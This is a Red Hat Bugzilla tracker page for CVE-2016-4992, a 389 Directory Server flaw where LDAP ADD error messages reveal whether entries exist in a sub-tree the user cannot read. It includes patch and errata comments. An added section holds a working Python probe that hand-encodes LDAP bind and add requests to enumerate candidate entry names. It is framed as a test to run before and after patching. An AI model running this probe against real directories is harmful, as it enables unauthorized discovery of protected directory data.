Bug 1347760 (CVE-2016-4992) - CVE-2016-4992 389-ds-base: Information disclosure via repeated use of LDAP ADD operation
Summary: CVE-2016-4992 389-ds-base: Information disclosure via repeated use of LDAP ADD operation
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2016-4992
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1347761 1347763 1350799 1358559 1358560 1358561
Blocks: 1323912 1347766
 
Reported: 2016-06-17 14:53 UTC by Adam Mariš
Modified: 2021-02-17 03:42 UTC (History)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
An information disclosure flaw was found in 389 Directory Server. A user with no access to objects in a certain LDAP sub-tree could send LDAP ADD operations with a specific object name. The error message returned to the user differed depending on whether the target object existed or not.
Clone Of:
Environment:
Last Closed: 2016-11-15 19:56:53 UTC


Attachments


Links
System: Red Hat Product Errata | ID: RHSA-2016:2594 | Private: 0 | Priority: normal | Status: SHIPPED_LIVE | Summary: Moderate: 389-ds-base security, bug fix, and enhancement update | Last Updated: 2016-11-03 12:11:08 UTC
System: Red Hat Product Errata | ID: RHSA-2016:2765 | Private: 0 | Priority: normal | Status: SHIPPED_LIVE | Summary: Moderate: 389-ds-base security, bug fix, and enhancement update | Last Updated: 2016-11-16 00:36:28 UTC

Description Adam Mariš 2016-06-17 14:53:47 UTC
A vulnerability in 389-ds-base was found that allows bypassing the limitations on compare and read operations specified by Access Control Instructions.

When having an LDAP sub-tree with some existing objects and a BIND DN which has no privileges over objects inside the sub-tree, an unprivileged user can send an LDAP ADD operation specifying an object in the (supposedly) inaccessible sub-tree. The returned error message discloses whether the queried object exists with the specified value. An attacker can use this flaw to guess values of the RDN component by repeating the above process.
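
The check that the Doc Text and the description above imply, written out as an added example (this is not code from 389-ds-base, from the reporters, or from this bug report): bind as a low-privilege DN, send one LDAP ADD per candidate RDN value under a sub-tree that DN has no rights to, and compare the resultCode and diagnosticMessage each ADD gets back. The page only says that the error differs when the target exists, so the script does not hard-code which code means "exists"; it groups candidates by the (resultCode, diagnosticMessage) pair and reports whether more than one group appears, which is the oracle. A patched server should answer every candidate alike. The two LDAP messages are BER-encoded by hand from RFC 4511 so that nothing outside the Python standard library is needed. The host, port, bind DN, password, parent DN, RDN attribute, candidate list and the objectClass used in the ADD are all assumptions for a lab directory, not values from this bug.

```python
"""Probe for the ADD-response oracle described in CVE-2016-4992.

Added example, not code from 389-ds-base or from this bug report. Host,
port, bind DN, password, parent DN, RDN attribute and candidate values
are placeholders for the reader's own lab directory.
"""
import socket
from collections import defaultdict

# --- minimal BER (X.690) encoding for BindRequest / AddRequest / LDAPResult ---

def ber_len(n: int) -> bytes:
    """Definite-form length: one byte below 128, 0x80|N followed by N bytes above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body

def ber_int(tag: int, value: int) -> bytes:
    """Non-negative INTEGER (0x02) / ENUMERATED (0x0a); keeps the sign bit clear."""
    return tlv(tag, value.to_bytes(max(1, (value.bit_length() + 8) // 8), "big"))

def ber_str(s: str) -> bytes:  # OCTET STRING; LDAP strings are UTF-8
    return tlv(0x04, s.encode("utf-8"))

def ldap_message(msg_id: int, protocol_op: bytes) -> bytes:
    return tlv(0x30, ber_int(0x02, msg_id) + protocol_op)

def bind_request(msg_id: int, bind_dn: str, password: str) -> bytes:
    """BindRequest [APPLICATION 0] (0x60): version 3, simple auth [CONTEXT 0] (0x80)."""
    op = ber_int(0x02, 3) + ber_str(bind_dn) + tlv(0x80, password.encode("utf-8"))
    return ldap_message(msg_id, tlv(0x60, op))

def add_request(msg_id: int, entry_dn: str, attrs: dict) -> bytes:
    """AddRequest [APPLICATION 8] (0x68): entry DN + SEQUENCE OF (type, SET OF values)."""
    attr_list = b"".join(
        tlv(0x30, ber_str(atype) + tlv(0x31, b"".join(ber_str(v) for v in vals)))
        for atype, vals in attrs.items())
    return ldap_message(msg_id, tlv(0x68, ber_str(entry_dn) + tlv(0x30, attr_list)))

def ber_read(buf: bytes, pos: int = 0):
    """Decode one TLV starting at pos; return (tag, body, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:
        length, pos = first, pos + 2
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos + 2:pos + 2 + nbytes], "big")
        pos += 2 + nbytes
    return tag, buf[pos:pos + length], pos + length

def parse_ldap_result(msg: bytes):
    """Unpack an LDAPMessage whose op is LDAPResult-shaped (BindResponse 0x61, AddResponse 0x69).

    Returns (msg_id, op_tag, resultCode, matchedDN, diagnosticMessage); controls are ignored.
    """
    _, body, _ = ber_read(msg)
    _, id_body, pos = ber_read(body)
    op_tag, op, _ = ber_read(body, pos)
    _, code, pos = ber_read(op)
    _, matched, pos = ber_read(op, pos)
    _, diag, _ = ber_read(op, pos)
    return (int.from_bytes(id_body, "big"), op_tag, int.from_bytes(code, "big"),
            matched.decode("utf-8"), diag.decode("utf-8"))

def _recv_exact(sock: socket.socket, n: int) -> bytes:
    data = b""
    while len(data) < n:
        part = sock.recv(n - len(data))
        if not part:
            raise ConnectionError("LDAP server closed the connection")
        data += part
    return data

def recv_ldap_message(sock: socket.socket) -> bytes:
    """Read exactly one BER-framed LDAPMessage (outer SEQUENCE) from the socket."""
    head = _recv_exact(sock, 2)
    if head[1] < 0x80:
        return head + _recv_exact(sock, head[1])
    len_bytes = _recv_exact(sock, head[1] & 0x7F)
    return head + len_bytes + _recv_exact(sock, int.from_bytes(len_bytes, "big"))

# --- the probe itself ---

def probe_add_oracle(host, port, bind_dn, password, parent_dn, rdn_attr, candidates, timeout=5.0):
    """Bind as a low-privilege DN, then ADD one entry per candidate under parent_dn.

    Every ADD is expected to be refused (the DN has no rights there); what is
    recorded is HOW it was refused: {candidate: (resultCode, diagnosticMessage)}.
    """
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(bind_request(1, bind_dn, password))
        _, tag, code, _, diag = parse_ldap_result(recv_ldap_message(sock))
        if tag != 0x61 or code != 0:
            raise RuntimeError(f"bind as {bind_dn} failed: resultCode={code} {diag!r}")
        for msg_id, value in enumerate(candidates, start=2):
            dn = f"{rdn_attr}={value},{parent_dn}"
            # Assumed minimal, schema-neutral entry. If an ADD ever succeeds the
            # ACI is broken in a bigger way and the entry must be removed by hand.
            attrs = {"objectClass": ["top", "extensibleObject"], rdn_attr: [value]}
            sock.sendall(add_request(msg_id, dn, attrs))
            got_id, _, code, _, diag = parse_ldap_result(recv_ldap_message(sock))
            if got_id != msg_id:
                raise RuntimeError(f"response {got_id} arrived while waiting for {msg_id}")
            results[value] = (code, diag)
    return results

def group_by_response(results: dict) -> dict:
    """Invert {candidate: answer} into {answer: [candidates]}."""
    groups = defaultdict(list)
    for value, answer in results.items():
        groups[answer].append(value)
    return dict(groups)

def oracle_present(results: dict) -> bool:
    """True when the refusal differs between candidates, i.e. existence leaks."""
    return len(group_by_response(results)) > 1

if __name__ == "__main__":
    # Placeholder lab values; the candidates are the RDN values an attacker would guess.
    found = probe_add_oracle("ldap.example.test", 389, "uid=lowpriv,ou=people,dc=example,dc=test",
                             "secret", "ou=hidden,dc=example,dc=test", "cn",
                             ["alice", "bob", "carol", "no-such-entry"])
    for answer, values in group_by_response(found).items():
        print(f"resultCode={answer[0]} diag={answer[1]!r}: {values}")
    print("oracle present" if oracle_present(found) else "all candidates answered alike")
```

Run it against a test instance before and after applying the errata: a server with the flaw splits the candidates into two groups (the existing entries answer one way, the made-up ones another), while a fixed server puts every candidate into a single group. The same record-and-compare approach carries over to the BIND case mentioned later in this bug, since `bind_request` and `parse_ldap_result` already handle BindResponse; only the loop body changes.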

Comment 1 Adam Mariš 2016-06-17 14:53:58 UTC
Acknowledgments:

Name: Petr Spacek (Red Hat), Martin Basti (Red Hat)

Comment 2 Adam Mariš 2016-06-17 14:54:25 UTC
Created 389-ds-base tracking bugs for this issue:

Affects: fedora-all [bug 1347761]
Affects: epel-5 [bug 1347763]

Comment 6 Noriko Hosoi 2016-06-21 00:23:07 UTC
Created attachment 1170018 [details]
git patch file (master) -- solves ADD case

Comment 13 Petr Spacek 2016-06-21 08:05:03 UTC
(In reply to Adam Mariš from comment #1)
> Acknowledgments:
> 
> Name: Petr Spacek (Red Hat)

Hi,

please add Martin Basti (Red Hat) to Acknowledgments, he was working on the code with me and we have spotted the problem together.

Comment 14 Adam Mariš 2016-06-21 08:40:57 UTC
> > Acknowledgments:
> > 
> > Name: Petr Spacek (Red Hat)
> 
> Hi,
> 
> please add Martin Basti (Red Hat) to Acknowledgments, he was working on the
> code with me and we have spotted the problem together.

Done!

---
didn't mean to remove the other needinfo, setting it back

Comment 20 Petr Spacek 2016-07-21 07:31:38 UTC
The description should be extended to BIND operation as well.

Comment 28 errata-xmlrpc 2016-11-03 20:42:57 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2016:2594 https://rhn.redhat.com/errata/RHSA-2016-2594.html

Comment 30 errata-xmlrpc 2016-11-15 19:37:24 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2016:2765 https://rhn.redhat.com/errata/RHSA-2016-2765.html

